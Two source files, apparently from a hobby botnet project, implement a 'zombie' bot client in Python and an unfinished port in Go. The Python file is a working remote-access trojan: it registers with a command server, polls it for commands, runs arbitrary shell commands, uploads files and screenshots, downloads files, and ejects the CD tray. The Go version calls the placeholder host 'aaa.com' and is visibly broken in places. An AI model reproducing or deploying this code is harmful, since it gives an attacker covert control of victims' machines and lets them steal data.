File: zombie/zombie.py
import urllib.request
import subprocess
import ast
import urllib.parse
from time import sleep
from PIL import ImageGrab
import requests

class Zombie:
    """ zombie class, hold all varaibles and functions of the zombie """
    def __init__(self):
        """ constructor """
        self.screenshot_id = 0
        self.guid  = self.get_guid()
        self.paths = {"add" : self.guid + '/add',
                      "remove" : self.guid + '/remove',
                      "sendcmd" : 'sendcmd/',
                      "getcmd" : self.guid + '/index.html',
                      "putfile" : self.guid + '/putfile/',
                      "getfile" : self.guid + '/getfile/',
                      "cmdlist" : self.guid + '/cmdlst'}

        self.url  = "http://127.0.0.1:5000/"
        self.cmds = []
        self.done = []

    def get_guid(self):
        return self.os("powershell.exe [guid]::newguid()").split("\r\n")[3]

    def add(self):
        """ add zombie to server """
        r = urllib.request.urlopen(self.url + self.paths["add"])

    def remove(self):
        """ remove zombie from server """
        r = urllib.request.urlopen(self.url + self.paths["remove"])
        exit()

    def get_cmd(self):
        """ get commands from server """
        r = urllib.request.urlopen(self.url + self.paths["getcmd"])
        r = r.read().decode("ascii")
        self.cmds = ast.literal_eval(r)
        if(self.cmds == []):
            sleep(5)
            self.get_cmd()

    def os(self, cmd):
        """ run os command """
        c = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
        (output, err) = c.communicate()
        output = output.decode("utf-8")
        return output

    def send_cmd(self):
        """ send done command list + output to server """
        params = {"lis" : self.done}
        query_string = urllib.parse.urlencode( params )
        data = query_string.encode( "ascii" )
        urllib.request.urlopen(self.url + self.paths["cmdlist"], data)

    def get_file(self, cmd):
        """ get file from server """
        r = urllib.request.urlopen(self.url + self.paths["getfile"] + cmd.split(" ")[1])
        r = r.read()
        f = open(cmd.split(" ")[1], "wb")
        f.write(r)
        f.close()

    def put_file(self, cmd):
        """ put file on server """
        file_name = cmd.split(" ")[1]
        files = {file_name : open(file_name, "rb")}
        requests.post(self.url + self.paths["putfile"] + file_name, files=files)

    def take_sshot(self):
        """ take screenshot """
        name = "s_" + str(self.screenshot_id) + ".jpg"
        ImageGrab.grab().save(name, "JPEG")
        self.put_file(" " + name)
        self.screenshot_id += 1

    def opendisc(self):
        subprocess.Popen('powershell (New-Object -com "WMPlayer.OCX.7").cdromcollection.item(0).eject()')

    def execute(self):
        """ execute command """
        cmd = self.cmds.pop()
        cmd, id = cmd[0], cmd[1]

        remove = ("remove" in cmd)
        getfile = ("getfile" in cmd)
        putfile = ("putfile" in cmd)
        screenshot = ("screenshot" in cmd)
        opendisc = ("opendisc" in cmd)

        if remove:
            self.remove()

        elif getfile:
            self.get_file(cmd)
            self.done.append([cmd ,id, "done!"])

        elif putfile:
            self.put_file(cmd)
            self.done.append([cmd ,id, "done!"])

        elif screenshot:
            self.take_sshot()
            self.done.append([cmd ,id, "done!"])

        elif opendisc:
            self.opendisc()
            self.done.append([cmd ,id, "done!"])

        else:
            out = self.os(cmd)
            self.done.append([cmd ,id, out])

z = Zombie()
z.add()
def main():
    while True:
        z.get_cmd()
        z.execute()
        z.send_cmd()
        sleep(5)

try:
    main()
except:
    sleep(5)
    main()

File: zombie/zombie.go
package zombie

import (
	"bytes"
	"encoding/json"
	"io/ioutil"
	"net/http"
	"os"
	"os/exec"
	"time"
)

const URL = "aaa.com"

type Zombie struct {
	guid string
	url  string
}

func New(guid string, url string) Zombie {
	z := Zombie{guid, url}
	return z
}

func (z Zombie) getGuid() string {
	return z.guid
}

func (z Zombie) getUrl() string {
	return z.guid
}

func (z Zombie) setUrl(newUrl string) {
	z.url = newUrl
}

func (z Zombie) sendPost(msg []byte) {
	req, _ := http.NewRequest("POST", z.getUrl(), bytes.NewBuffer(msg))
	client := &http.Client{}
	client.Do(req)
}

func (z Zombie) getCommand(commands []string) {
	for i := 0; i < len(commands); i++ {
		var command = commands[i]
		switch command {
		case "add":
			z.add()
		case "remove":
			z.remove()
		case "exacCommand":
			var cmd = ""
			z.exacCommand(cmd)
		case "getFile":
			var path = ""
			z.getFile(path)
		case "putFile":
			var path = ""
			z.putFile(path)
		default:
			break
		}
	}
}

func (z Zombie) add() {
	http.Get(URL + "/add " + z.guid)
}

func (z Zombie) remove() {
	http.Get(URL + "/remove " + z.guid)
}

func (z Zombie) exacCommand(com string) {
	out, _ := exec.Command(com).Output()
	z.sendPost(out)
}

func (z Zombie) getFile(path string) {
	resp, err := http.Get(z.getUrl())
	if err == err {
	}
	defer resp.Body.Close()
	out, err := os.Create(path)
	if err == err {
	}
	defer out.Close()
	z.sendPost([]byte("done"))
}

func (z Zombie) putFile(path string) {
	file, _ := os.Open(path)
	byteFile, _ := ioutil.ReadFile(path)
	defer file.Close()
	z.sendPost([]byte(byteFile))
	/*
		defer file.Close()
		var requestBody bytes.Buffer
		multiPartWriter := multipart.NewWriter(&requestBody)
		***************** file field*****************
		fileWriter, err := multiPartWriter.CreateFormFile("file_field", path)
		_, err = io.Copy(fileWriter, file)
		//****************** normal field*****************
		fieldWriter, err := multiPartWriter.CreateFormField("normal_field")
		_, err = fieldWriter.Write([]byte("Value"))
		multiPartWriter.Close()
		req, err := http.NewRequest("POST", url, &requestBody)
		//****************** content type*****************
		req.Header.Set("Content-Type", multiPartWriter.FormDataContentType())
		client := &http.Client{}
		response, err := client.Do(req)
		if response == response {
		}
	*/
}

func (z Zombie) run() {
	for true {
		resp, _ := http.Get(z.getUrl())
		body, _ := ioutil.ReadAll(resp.Body)
		strCommands := string(body)
		//commands := strings.Split(strCommands, "[]")
		var commands []string
		json.Unmarshal([]byte(strCommands), &commands)
		z.getCommand(commands)
		time.Sleep(10 * time.Second)
	}
}
func main() {
	z1 := Zombie{URL, "guid"}
	z1.run()
}
